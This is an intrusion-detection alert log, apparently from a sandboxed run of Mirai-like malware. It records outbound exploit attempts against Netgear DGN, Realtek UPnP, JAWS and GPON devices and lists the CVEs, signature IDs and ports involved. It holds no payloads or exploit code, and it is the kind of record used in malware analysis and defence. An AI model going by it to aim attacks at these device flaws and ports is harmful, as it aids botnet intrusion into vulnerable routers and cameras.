                                                              2024-12-11T00:43:07.328718+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2340804102.112.159.15980TCP
                                                              2024-12-11T00:43:07.329096+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235565654.252.138.17280TCP
                                                              2024-12-11T00:43:07.329096+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235565654.252.138.17280TCP
                                                              2024-12-11T00:43:07.329456+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2359574103.183.65.21780TCP
                                                              2024-12-11T00:43:07.330571+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2351804193.245.80.6852869TCP
                                                              2024-12-11T00:43:07.332415+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2341712180.236.218.2238080TCP
                                                              2024-12-11T00:43:07.332831+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351422177.60.56.1105555TCP
                                                              2024-12-11T00:43:07.333175+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233652291.41.16.1188080TCP
                                                              2024-12-11T00:43:07.333510+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235106673.124.161.5552869TCP
                                                              2024-12-11T00:43:07.333900+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2354874217.238.86.7352869TCP
                                                              2024-12-11T00:43:07.334256+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2344164131.95.252.21852869TCP
                                                              2024-12-11T00:43:07.334630+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338868141.202.115.1627574TCP
                                                              2024-12-11T00:43:07.335741+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339344205.19.156.15480TCP
                                                              2024-12-11T00:43:07.336104+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340430214.6.88.20049152TCP
                                                              2024-12-11T00:43:07.336474+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346876190.202.109.2417574TCP
                                                              2024-12-11T00:43:07.336842+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341916126.179.23.11180TCP
                                                              2024-12-11T00:43:07.337570+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235906667.156.164.3880TCP
                                                              2024-12-11T00:43:07.338331+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356796121.202.179.680TCP
                                                              2024-12-11T00:43:07.338331+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356796121.202.179.680TCP
                                                              2024-12-11T00:43:07.339072+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339970217.176.190.10949152TCP
                                                              2024-12-11T00:43:07.339437+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233795690.24.179.1638080TCP
                                                              2024-12-11T00:43:07.340177+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233352681.109.6.2005555TCP
                                                              2024-12-11T00:43:07.344983+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2349554179.171.182.1198080TCP
                                                              2024-12-11T00:43:07.345708+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2335372170.59.144.17952869TCP
                                                              2024-12-11T00:43:07.346799+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344166166.117.94.497574TCP
                                                              2024-12-11T00:43:07.347181+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234246682.213.155.868080TCP
                                                              2024-12-11T00:43:07.347915+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234212092.244.233.2068080TCP
                                                              2024-12-11T00:43:07.348277+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338328187.114.160.1627574TCP
                                                              2024-12-11T00:43:07.349014+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2342974179.30.194.10852869TCP
                                                              2024-12-11T00:43:07.349763+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233900622.236.52.2398080TCP
                                                              2024-12-11T00:43:07.350127+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333314153.28.27.688080TCP
                                                              2024-12-11T00:43:07.351238+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235974056.225.44.2208080TCP
                                                              2024-12-11T00:43:07.351608+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236070296.114.30.20780TCP
                                                              2024-12-11T00:43:07.351988+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23493164.134.245.14849152TCP
                                                              2024-12-11T00:43:07.352359+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234972673.24.73.2327574TCP
                                                              2024-12-11T00:43:07.352709+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355636117.31.40.2085555TCP
                                                              2024-12-11T00:43:07.354186+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335922194.17.56.14680TCP
                                                              2024-12-11T00:43:07.354186+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335922194.17.56.14680TCP
                                                              2024-12-11T00:43:07.354557+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340054161.199.60.2035555TCP
                                                              2024-12-11T00:43:07.355315+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344314173.120.168.2398080TCP
                                                              2024-12-11T00:43:07.356033+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340896186.182.149.1107574TCP
                                                              2024-12-11T00:43:07.356397+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233328643.107.215.19949152TCP
                                                              2024-12-11T00:43:07.357127+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350674150.55.156.7980TCP
                                                              2024-12-11T00:43:07.357127+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350674150.55.156.7980TCP
                                                              2024-12-11T00:43:07.358215+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234498693.22.239.4880TCP
                                                              2024-12-11T00:43:07.358580+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359632196.150.108.1225555TCP
                                                              2024-12-11T00:43:07.359679+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234453439.106.254.707574TCP
                                                              2024-12-11T00:43:07.360400+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355572210.164.84.18549152TCP
                                                              2024-12-11T00:43:07.360768+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2339328213.56.209.19380TCP
                                                              2024-12-11T00:43:07.361137+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23358523.179.237.11780TCP
                                                              2024-12-11T00:43:07.361137+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23358523.179.237.11780TCP
                                                              2024-12-11T00:43:07.361506+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235267878.160.226.2198080TCP
                                                              2024-12-11T00:43:07.361858+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346306167.83.233.3549152TCP
                                                              2024-12-11T00:43:07.362610+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234671412.69.195.2267574TCP
                                                              2024-12-11T00:43:07.363320+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233762274.94.9.12652869TCP
                                                              2024-12-11T00:43:07.363679+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23524108.202.67.2298080TCP
                                                              2024-12-11T00:43:07.364039+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233682279.79.71.15252869TCP
                                                              2024-12-11T00:43:07.364409+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234525045.22.47.1038080TCP
                                                              2024-12-11T00:43:07.364771+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2336960211.174.66.23980TCP
                                                              2024-12-11T00:43:07.365131+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353022117.238.33.988080TCP
                                                              2024-12-11T00:43:07.365502+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234780215.233.37.15049152TCP
                                                              2024-12-11T00:43:07.365857+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2338360140.124.226.1888080TCP
                                                              2024-12-11T00:43:07.366583+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358264131.241.38.20580TCP
                                                              2024-12-11T00:43:07.366583+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358264131.241.38.20580TCP
                                                              2024-12-11T00:43:07.366941+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351382113.213.140.11080TCP
                                                              2024-12-11T00:43:07.366941+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351382113.213.140.11080TCP
                                                              2024-12-11T00:43:07.368035+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234310273.249.134.1885555TCP
                                                              2024-12-11T00:43:07.368389+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2346238174.204.37.1558080TCP
                                                              2024-12-11T00:43:07.369121+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234232084.150.50.20980TCP
                                                              2024-12-11T00:43:07.369486+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337202216.199.223.13980TCP
                                                              2024-12-11T00:43:07.369486+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337202216.199.223.13980TCP
                                                              2024-12-11T00:43:07.370581+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2344416113.8.22.9752869TCP
                                                              2024-12-11T00:43:07.371300+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235422642.186.151.8452869TCP
                                                              2024-12-11T00:43:07.371665+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2359510142.96.19.19280TCP
                                                              2024-12-11T00:43:07.372034+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234121496.205.70.20280TCP
                                                              2024-12-11T00:43:07.372794+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345340110.161.89.1855555TCP
                                                              2024-12-11T00:43:07.373112+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.236074636.77.84.3352869TCP
                                                              2024-12-11T00:43:07.373838+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234401847.80.200.9580TCP
                                                              2024-12-11T00:43:07.374990+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234520062.103.171.2880TCP
                                                              2024-12-11T00:43:07.374990+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234520062.103.171.2880TCP
                                                              2024-12-11T00:43:07.375297+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235311228.102.126.4980TCP
                                                              2024-12-11T00:43:07.375297+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235311228.102.126.4980TCP
                                                              2024-12-11T00:43:07.376752+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236004493.98.197.17980TCP
                                                              2024-12-11T00:43:07.377109+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234736293.52.53.08080TCP
                                                              2024-12-11T00:43:07.377468+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358704134.145.254.1758080TCP
                                                              2024-12-11T00:43:07.381892+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341714113.229.7.21380TCP
                                                              2024-12-11T00:43:07.382187+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234290684.2.80.5752869TCP
                                                              2024-12-11T00:43:07.382550+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234044021.244.144.8680TCP
                                                              2024-12-11T00:43:07.382911+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354856167.151.164.417574TCP
                                                              2024-12-11T00:43:07.383635+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2347372162.33.207.20552869TCP
                                                              2024-12-11T00:43:07.384360+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2356902194.213.146.3952869TCP
                                                              2024-12-11T00:43:07.384722+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.236074828.144.199.558080TCP
                                                              2024-12-11T00:43:07.385473+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351548182.98.49.248080TCP
                                                              2024-12-11T00:43:07.385816+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351398210.181.40.1428080TCP
                                                              2024-12-11T00:43:07.387272+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2336224124.74.74.1148080TCP
                                                              2024-12-11T00:43:07.387676+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2347786210.135.157.1080TCP
                                                              2024-12-11T00:43:07.387992+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350042137.151.78.14380TCP
                                                              2024-12-11T00:43:07.387992+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350042137.151.78.14380TCP
                                                              2024-12-11T00:43:07.388357+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2354236136.34.183.280TCP
                                                              2024-12-11T00:43:07.390175+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353188118.35.168.1548080TCP
                                                              2024-12-11T00:43:07.390539+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339032134.32.128.2357574TCP
                                                              2024-12-11T00:43:07.390899+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2339016123.244.144.20880TCP
                                                              2024-12-11T00:43:07.391272+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2353766161.185.149.3280TCP
                                                              2024-12-11T00:43:08.920578+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2333840197.215.52.3180TCP
                                                              2024-12-11T00:43:09.665707+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.236089245.153.216.852869TCP
                                                              2024-12-11T00:43:10.033658+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350158220.74.77.18649152TCP
                                                              2024-12-11T00:43:10.233624+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358998222.31.51.5449152TCP
                                                              2024-12-11T00:43:10.245617+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235047849.122.11.825555TCP
                                                              2024-12-11T00:43:10.245617+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349998175.239.142.24249152TCP
                                                              2024-12-11T00:43:10.367267+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235373661.236.10.247574TCP
                                                              2024-12-11T00:43:10.797458+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344828102.75.189.13480TCP
                                                              2024-12-11T00:43:10.797458+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344828102.75.189.13480TCP
                                                              2024-12-11T00:43:17.284821+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339344164.60.72.1347574TCP
                                                              2024-12-11T00:43:17.285464+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235048491.32.136.6080TCP
                                                              2024-12-11T00:43:17.285813+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235347671.213.59.19080TCP
                                                              2024-12-11T00:43:17.286544+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236009054.126.187.15780TCP
                                                              2024-12-11T00:43:17.319060+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235839429.209.111.1947574TCP
                                                              2024-12-11T00:43:17.320175+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358366167.177.237.1325555TCP
                                                              2024-12-11T00:43:17.320543+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234363211.152.97.24849152TCP
                                                              2024-12-11T00:43:17.321348+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348140158.155.184.15380TCP
                                                              2024-12-11T00:43:17.321348+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348140158.155.184.15380TCP
                                                              2024-12-11T00:43:17.322033+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234789057.137.146.12480TCP
                                                              2024-12-11T00:43:17.388823+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23436781.156.155.2205555TCP
                                                              2024-12-11T00:43:17.976552+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2341912152.158.234.1980TCP
                                                              2024-12-11T00:43:18.085937+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234215471.44.225.11280TCP
                                                              2024-12-11T00:43:18.087487+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2351548182.98.49.248080TCP
                                                              2024-12-11T00:43:18.087768+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2360422184.96.7.288080TCP
                                                              2024-12-11T00:43:18.088492+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235642447.30.123.2128080TCP
                                                              2024-12-11T00:43:18.088729+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2353384162.198.43.2278080TCP
                                                              2024-12-11T00:43:18.089988+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234867640.223.116.25480TCP
                                                              2024-12-11T00:43:18.090642+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233863256.53.8.680TCP
                                                              2024-12-11T00:43:18.090878+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2341714113.229.7.21380TCP
                                                              2024-12-11T00:43:18.092271+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235488023.173.106.2780TCP
                                                              2024-12-11T00:43:18.092652+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2351378113.145.142.2028080TCP
                                                              2024-12-11T00:43:18.093079+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23552649.58.179.10980TCP
                                                              2024-12-11T00:43:18.093396+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2354774204.81.207.1888080TCP
                                                              2024-12-11T00:43:18.093584+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2351398210.181.40.1428080TCP
                                                              2024-12-11T00:43:18.093768+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2343226206.130.7.228080TCP
                                                              2024-12-11T00:43:18.094600+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2354806143.186.21.17380TCP
                                                              2024-12-11T00:43:18.094952+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2353188118.35.168.1548080TCP
                                                              2024-12-11T00:43:18.095296+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2339352222.38.112.22880TCP
                                                              2024-12-11T00:43:18.096708+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23406309.109.75.1278080TCP
                                                              2024-12-11T00:43:18.117093+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2341280215.50.246.238080TCP
                                                              2024-12-11T00:43:18.227835+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2337392207.198.77.4580TCP
                                                              2024-12-11T00:43:18.228788+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2339344205.19.156.15480TCP
                                                              2024-12-11T00:43:18.229284+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2341916126.179.23.11180TCP
                                                              2024-12-11T00:43:18.242728+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2358674163.115.127.19180TCP
                                                              2024-12-11T00:43:18.245597+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2337292149.210.29.20180TCP
                                                              2024-12-11T00:43:18.245999+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233652291.41.16.1188080TCP
                                                              2024-12-11T00:43:18.247533+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233795690.24.179.1638080TCP
                                                              2024-12-11T00:43:18.248918+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235906667.156.164.3880TCP
                                                              2024-12-11T00:43:18.249169+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2359380212.148.153.19280TCP
                                                              2024-12-11T00:43:18.283960+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354490172.27.14.5380TCP
                                                              2024-12-11T00:43:18.284369+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233933037.106.97.8680TCP
                                                              2024-12-11T00:43:18.284369+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233933037.106.97.8680TCP
                                                              2024-12-11T00:43:18.285076+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233678881.14.183.2298080TCP
                                                              2024-12-11T00:43:18.285454+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348332172.201.78.23080TCP
                                                              2024-12-11T00:43:18.286582+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233448481.152.153.10480TCP
                                                              2024-12-11T00:43:18.286582+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233448481.152.153.10480TCP
                                                              2024-12-11T00:43:18.287320+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233763475.88.145.14780TCP
                                                              2024-12-11T00:43:18.287683+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356468133.86.189.705555TCP
                                                              2024-12-11T00:43:18.288047+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344310191.118.66.1488080TCP
                                                              2024-12-11T00:43:18.288518+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350746117.194.49.1278080TCP
                                                              2024-12-11T00:43:18.288794+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234850687.186.17.24380TCP
                                                              2024-12-11T00:43:18.289188+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233351864.246.130.6580TCP
                                                              2024-12-11T00:43:18.289188+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233351864.246.130.6580TCP
                                                              2024-12-11T00:43:18.289920+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233564259.92.247.20652869TCP
                                                              2024-12-11T00:43:18.290266+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356766148.104.170.2098080TCP
                                                              2024-12-11T00:43:18.290643+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234085623.210.109.408080TCP
                                                              2024-12-11T00:43:18.291392+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348354162.154.175.13880TCP
                                                              2024-12-11T00:43:18.291392+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348354162.154.175.13880TCP
                                                              2024-12-11T00:43:18.292874+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234056253.197.184.6480TCP
                                                              2024-12-11T00:43:18.293620+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2333368150.143.19.21080TCP
                                                              2024-12-11T00:43:18.293980+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2335442145.145.175.508080TCP
                                                              2024-12-11T00:43:18.294348+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334732198.246.28.1455555TCP
                                                              2024-12-11T00:43:18.295103+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356000156.9.96.4380TCP
                                                              2024-12-11T00:43:18.295480+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2343934136.165.68.16080TCP
                                                              2024-12-11T00:43:18.296582+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357392168.22.178.1618080TCP
                                                              2024-12-11T00:43:18.297687+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2360202169.70.235.2038080TCP
                                                              2024-12-11T00:43:18.298058+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234148828.130.196.1418080TCP
                                                              2024-12-11T00:43:18.298793+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234221253.169.246.14852869TCP
                                                              2024-12-11T00:43:18.299164+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2334504203.246.201.1788080TCP
                                                              2024-12-11T00:43:18.299890+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339800205.55.79.2368080TCP
                                                              2024-12-11T00:43:18.300261+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235380245.210.95.2188080TCP
                                                              2024-12-11T00:43:18.300632+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335700115.248.197.1467574TCP
                                                              2024-12-11T00:43:18.301001+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233672860.31.41.497574TCP
                                                              2024-12-11T00:43:18.302485+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2352460199.190.42.21680TCP
                                                              2024-12-11T00:43:18.303244+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353262137.77.114.15680TCP
                                                              2024-12-11T00:43:18.303956+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235295634.155.65.1928080TCP
                                                              2024-12-11T00:43:18.304321+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233540431.125.159.698080TCP
